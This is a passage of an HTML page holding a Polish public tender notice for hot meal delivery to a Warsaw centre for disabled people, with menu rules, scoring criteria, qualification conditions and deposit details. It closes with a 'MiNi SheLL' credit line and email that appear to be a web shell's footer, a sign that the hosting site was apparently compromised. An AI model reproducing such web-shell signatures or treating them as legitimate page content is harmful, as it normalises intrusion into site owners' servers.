class="normal">Zatrudnienie kierowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">2</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przygotowanie i dowożenie do siedziby Ośrodka Wsparcia i Rehabilitacji dla Osób Niepełnosprawnych (OWiRON) przy ul. Rozłogi 10 w Warszawie gorących zestawów obiadowych dla uprawnionych klientów OWiRON przez 5 dni w tygodniu, od poniedziałku do piątku, z wyłączeniem dni wolnych i świąt <br/>2)	Przewidywana, szacunkowa liczba wydawanych zestawów obiadowych w skali realizacji całej umowy wyniesie do 5 261 sztuk (zestawów). Zamawiający ma prawo do ograniczenia liczby zamawianych gorących posiłków, przy czym Zamawiający zamierza wykupić i nie mniej niż 4 200. Ostateczne całkowite wynagrodzenie za obiady wydane przez cały okres obowiązywania umowy wynikać będzie z faktycznej liczby wydanych obiadów. Wykonawcy nie przysługują względem Zamawiającego jakiekolwiek roszczenia z tytułu niezrealizowania pełnej liczby przedmiotu zamówienia.<br/>3)	Przewidywana liczba osób zgłoszonych do korzystania z pomocy w formie gorącego posiłku – obiadu wynosić będzie średnio ok. 28 osób.<br/>4)	Liczba osób, a tym samym liczba zamawianych zestawów obiadowych, może być zmienna i różnić się w poszczególnych miesiącach. <br/>5)	Gorące zestawy obiadowe dla osób uprawnionych będą dowożone przez Wykonawcę w szczelnie zamkniętych, termicznych i jednorazowych biodegradowalnych pojemnikach;<br/>6)	Zestawy obiadowe będą dowożone przez Wykonawcę uprawnionym klientom do OWiRON od poniedziałku do piątku, z wyłączeniem dni wolnych i świąt, w godzinach 12:30 – 14:00; <br/>7)	Wszelkie koszty związane z dowozem zestawów obiadowych ponosi Wykonawca;<br/>8)	Istnieje możliwość dowożenia do Ośrodka Wsparcia i Rehabilitacji dla Osób Niepełnosprawnych, w uzasadnionych przypadkach, suchego prowiantu jako zamiennika za gorący posiłek, po uprzednim pisemnym uzgodnieniu Wykonawcy z Zamawiającym.<br/>9)	Sposób zgłaszania osób uprawnionych do otrzymania zestawów obiadowych:<br/>a)	Upoważniony pracownik OPS będzie przekazywał Wykonawcy liczbę zamówionych zestawów obiadowych na poszczególne dni nie później niż 2 dni robocze przed końcem danego miesiąca, na każdy następny miesiąc;<br/>b)	W przypadku zmian w danym miesiącu dotyczących liczby zestawów obiadowych, informacja o tych zmianach będzie przekazana do godz. 9.00 w dniu dowiezienia obiadów.<br/>10)	Wykonawca jest zobowiązany do przygotowania i wydawania obiadów z zachowaniem poniżej określonych warunków.<br/>11)	Zestawy obiady powinny być urozmaicone, składać się z tradycyjnych potraw złożonych z co najmniej z dwóch dań:<br/>a)	I danie: zupa z pieczywem;<br/>b)	II danie wieloskładnikowe, surówka/warzywa oraz kompot lub napój.<br/>12)	W ciągu pięciodniowego żywienia klienci powinni otrzymać trzy razy w tygodniu obiad z porcją mięsa (np. sztuka mięsa, kotlet schabowy, udziec z kurczaka, kotlet mielony), raz w tygodniu obiad z rybą, w pozostały dzień dowolność ustalenia menu.<br/><br/>Zapisy wspólne dotyczące zarówno Części I jak i Części II przedmiotu zamówienia.<br/>1)	Wymagana wartość energetyczna oraz Minimalna wymagana waga/objętość gotowych potraw szczegółowo opisane w Rozdz. III SWZ.<br/>2)	Posiłki będą przygotowane z pełnowartościowych produktów, z uwzględnieniem świeżych warzyw i owoców sezonowych.<br/>3)	Wartość odżywcza i energetyczna posiłków musi być zgodna z normami i wytycznymi Instytutu Żywności i Żywienia w zakresie żywienia osób dorosłych.<br/>4)	Co tydzień - najpóźniej do piątku do godz. 16.00 Wykonawca przekaże Zamawiającemu (pocztą elektroniczną) jadłospis na tydzień następny. Jadłospis będzie obejmował gramaturę poszczególnych dań.<br/>5)	Wykonawca realizując przedmiot zamówienia zobowiązany jest do przestrzegania przepisów prawnych w tym również przepisów w zakresie przechowywania i przygotowywania artykułów spożywczych.<br/>6)	Posiłki oraz miejsce ich przygotowania i wydawania muszą spełniać wszystkie wymogi ustawy z dnia 25.08.2006 r. o bezpieczeństwie żywności i żywienia (t. j. Dz. U z 2023 r. poz. 1448).<br/>7)	Samochód/samochody, którym dowożone będą posiłki będzie dostosowany do przewozu żywności, spełniający wszystkie wymagania określone stosownymi przepisami. Wykonawca musi dysponować zaświadczeniem/decyzją/opinią stwierdzającym zatwierdzenie środków transportu przez Państwowa Inspekcję Sanitarną.<br/>8)	W przypadku awarii lub innych nieprzewidzianych zdarzeń Wykonawca jest zobowiązany zapewnić posiłki o nie gorszej jakości na swój koszt z innych źródeł.<br/>9)	Rozliczenie między Zamawiającym i Wykonawcą odbywać się będzie raz w miesiącu do 10 dnia następnego miesiąca, na podstawie prawidłowo wystawionej przez Wykonawcę faktury z podaną liczbą wydanych obiadów, co Wykonawca udokumentuje przedstawiając wygenerowany raport z liczby wydanych obiadów w miesiącu poprzednim. <br/>10)	Złożona faktura wraz z listą osób i liczbą obiadów podlega sprawdzeniu pod względem zgodności dostarczenia do klientów z liczbą wydanych obiadów przez Wykonawcę w miesięcznym okresie rozliczeniowym.<br/>11)	Za prowadzenie dokumentacji stanowiącej podstawę rozliczenia liczby obiadów Zamawiający nie przewiduje dodatkowej opłaty, stanowi to koszt Wykonawcy.<br/>12)	Zamawiający zastrzega sobie prawo weryfikacji jadłospisu oraz przeprowadzenia kontroli jakości, wartości odżywczych oraz gramatury potraw przez wytypowanych pracowników Zamawiającego. W szczególności poprzez:<br/>a)	porównanie zgodności z jadłospisem,<br/>b)	ocenę organoleptyczną (ocena wyglądu potraw, zapachu, oraz smaku poprzez degustację),<br/>c)	ważenie potraw,<br/>d)	porównanie z tabelami wartości odżywczych Instytutu Żywności i Żywienia.<br/><br/>Klauzule społeczne szczegółowo opisane w Rozdz. III SWZ </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 93480,18 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55321000-6 - Usługi przygotowywania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55322000-3 - Usługi gotowania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty zostaną ocenione wg wzorów podanych w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie w żywieniu zbiorowym</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe kucharza</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie dietetyka</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">3</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie kierowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">2</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: warunek zostanie uznany za spełniony, jeśli Wykonawca, zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 29 maja 2007 r. w sprawie wzorów dokumentów dotyczących rejestracji i zatwierdzania zakładów produkujących lub wprowadzających do obrotu żywność podlegających urzędowej kontroli Państwowej Inspekcji Sanitarnej (Dz. U. Nr 106 poz. 730 ze zm.), posiada wpis do rejestru zakładów podlegających urzędowej kontroli organów Państwowej Inspekcji Sanitarnej oraz decyzję Państwowego Powiatowego Inspektora Sanitarnego zezwalającą na prowadzenie określonej działalności gospodarczej, a w przypadku jednostek, które rozpoczęły działalność gospodarczą przed wejściem w życie ww. rozporządzenia - co najmniej decyzję Państwowego Powiatowego Inspektora Sanitarnego zezwalającą na prowadzenie określonej działalności gospodarczej. Spełnienie warunku opisanego powyżej będzie oceniane na podstawie Oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu.<br/>3)	sytuacji ekonomicznej lub finansowej: warunek zostanie uznany za spełniony, jeśli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej (OC) w zakresie prowadzonej działalności, związanej z przedmiotem niniejszego zamówienia, na kwotę nie niższą niż:<br/>a)	200 000,00 zł (słownie: dwieście tysięcy złotych 00/100) dla Części 1 i 2 lub dla Części 1 zamówienia, albo<br/>b)	80 000,00 zł (słownie: osiemdziesiąt tysięcy złotych 00/100) dla Części 2 zamówienia<br/>Spełnienie warunku opisanego powyżej będzie oceniane na etapie oceny i wyboru oferty na podstawie Oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu ze wskazaniem sumy gwarancyjnej tego ubezpieczenia. <br/>4)	zdolności technicznej lub zawodowej: warunek zostanie uznany za spełniony, jeśli Wykonawca posiada co najmniej jeden samochód dostosowany do przewozu żywności, spełniający wszystkie wymagania określone stosownymi przepisami. Spełnienie warunku opisanego powyżej będzie oceniane na podstawie Oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu.<br/>Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców (warunki te musi spełniać co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – wzór stanowi Załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">-Wykaz podwykonawców wraz z zakresem jaki zostanie im powierzony przy realizacji zamówienia wg wzoru określonego w Załączniku nr 6 do SWZ – jeśli dotyczy<br/>-Zobowiązania innego podmiotu - wg wzoru określonego w Załączniku nr 7 do SWZ - jeśli dotyczy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> - Wykazu wykonanych przez Wykonawcę usług – wg wzoru określonego w Załączniku nr 5 do SWZ jeżeli Wykonawca ubiega się o uzyskanie punktów w tym pozacenowym kryterium oceny ofert; <br/>- Wykaz dokumentów potwierdzających doświadczenie zawodowe kucharza w przypadku, jeżeli Wykonawca ubiega się o uzyskanie punktów w tym pozacenowym kryterium oceny ofert. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest wnieść wadium, przed upływem terminu składania ofert, w wysokości:<br/>1)	1 500,00 PLN (słownie jeden tysiąc pięćset złotych 00/100) na Część I zamówienia,<br/>2) 500,00 PLN (słownie pięćset złotych 00/100) na Część II zamówienia.<br/>2.	Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących formach, w zależności od wyboru Wykonawcy: <br/>a)	w pieniądzu, przelewem na rachunek depozytowy nr 11 1030 1508 0000 0005 5046 4007 z zaznaczeniem, że przelew dotyczy: „Wadium przetargowe – nr sprawy IOD.26.1.5.2024.SJ Cz. _”;<br/>b)	gwarancjach bankowych;<br/>c)	gwarancjach ubezpieczeniowych;<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j. Dz. U. z 2024 r. poz. 419 ze zm.).<br/>3.	Zgodnie z art. 97 ust. 10 PZP, jeżeli wadium będzie wnoszone w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2–4 ustawy Pzp, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej zgodnie z wymogami określonymi w SWZ.<br/>4.	Wadium wniesione przez jednego ze wspólników konsorcjum w imieniu całego konsorcjum uważa się za wniesione prawidłowo.<br/>5.	Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany w ust. 2 rachunek bankowy Zamawiającego, najpóźniej przed upływem terminu składania ofert.<br/>6.	Ze względu na ryzyko związane z czasem trwania okresu rozliczeń międzybankowych Zamawiający zaleca dokonanie przelewu ze stosownym wyprzedzeniem.<br/>7.	Zwrot oraz zatrzymanie wadium przez Zamawiającego reguluje art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy/usługi wykonają poszczególni Wykonawcy.<br/>3.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>4.	W przypadku wspólnego ubiegania się przez Wykonawców o zamówienie, Zamawiający dopuszcza możliwość łącznego spełnienia i dokumentowania warunków udziału w postępowaniu dotyczących sytuacji ekonomicznej i zdolności zawodowej.<br/>5.	Przed podpisaniem umowy z Zamawiającym (w przypadku wyboru ich oferty jako najkorzystniejszej) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia przedstawią Zamawiającemu umowę regulującą współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowo określone w projektowanych postanowieniach umowy stanowiących Zał Nr 1 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa oferty za pośrednictwem Platformy e-zamówienia dostępnej pod adresem https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-11 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com